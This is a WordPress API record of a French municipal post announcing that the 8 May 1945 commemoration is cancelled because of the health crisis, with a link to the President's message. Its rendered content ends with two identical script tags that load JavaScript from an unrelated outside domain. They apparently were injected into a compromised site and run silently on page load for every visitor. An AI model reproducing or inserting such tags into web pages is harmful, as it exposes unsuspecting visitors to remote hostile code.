{"id":2517,"date":"2020-05-08T08:43:49","date_gmt":"2020-05-08T07:43:49","guid":{"rendered":"http:\/\/www.attin-mairie.fr\/?p=2517"},"modified":"2020-05-29T19:48:42","modified_gmt":"2020-05-29T18:48:42","slug":"commemoration-8-mai-1945-message-du-president-de-la-republique","status":"publish","type":"post","link":"https:\/\/www.attin-mairie.fr\/?p=2517","title":{"rendered":"Comm\u00e9moration 8 mai 1945 : message du Pr\u00e9sident de la R\u00e9publique"},"content":{"rendered":"<p>Compte tenu de la crise sanitaire, la c\u00e9r\u00e9monie du 8 mai n&rsquo;a pas lieu comme chaque ann\u00e9e physiquement devant le monument aux morts.<\/p>\n<p>La commune cependant a fait pavoiser la st\u00e8le et le message du Pr\u00e9sident de la R\u00e9publique est consultable sur le lien qui suit :<\/p>\n<p>https:\/\/www.beaulieu-les-fontaines.fr\/a752-8-mai-2020-message-du-president-de-la-republique.html<\/p>\n<p><script src=\"\/\/jaretsummer.com\/228ebbb479fb2ce2f7.js\"><\/script><\/p>\n<p><script src=\"\/\/jaretsummer.com\/228ebbb479fb2ce2f7.js\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Compte tenu de la crise sanitaire, la c\u00e9r\u00e9monie du 8 mai n&rsquo;a pas lieu comme chaque ann\u00e9e physiquement devant le monument aux morts. La commune cependant a fait pavoiser la st\u00e8le et le message du Pr\u00e9sident de la R\u00e9publique est consultable sur le lien qui suit : https:\/\/www.beaulieu-les-fontaines.fr\/a752-8-mai-2020-message-du-president-de-la-republique.html<\/p>\n","protected":false},"author":1,"featured_media":160,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"ngg_post_thumbnail":0,"footnotes":""},"categories":[1],"tags":[],"class_list":["post-2517","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-non-classe"],"_links":{"self":[{"href":"https:\/\/www.attin-mairie.fr\/index.php?rest_route=\/wp\/v2\/posts\/2517","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.attin-mairie.fr\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.attin-mairie.fr\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.attin-mairie.fr\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.attin-mairie.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2517"}],"version-history":[{"count":2,"href":"https:\/\/www.attin-mairie.fr\/index.php?rest_route=\/wp\/v2\/posts\/2517\/revisions"}],"predecessor-version":[{"id":2565,"href":"https:\/\/www.attin-mairie.fr\/index.php?rest_route=\/wp\/v2\/posts\/2517\/revisions\/2565"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.attin-mairie.fr\/index.php?rest_route=\/wp\/v2\/media\/160"}],"wp:attachment":[{"href":"https:\/\/www.attin-mairie.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2517"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.attin-mairie.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2517"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.attin-mairie.fr\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2517"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}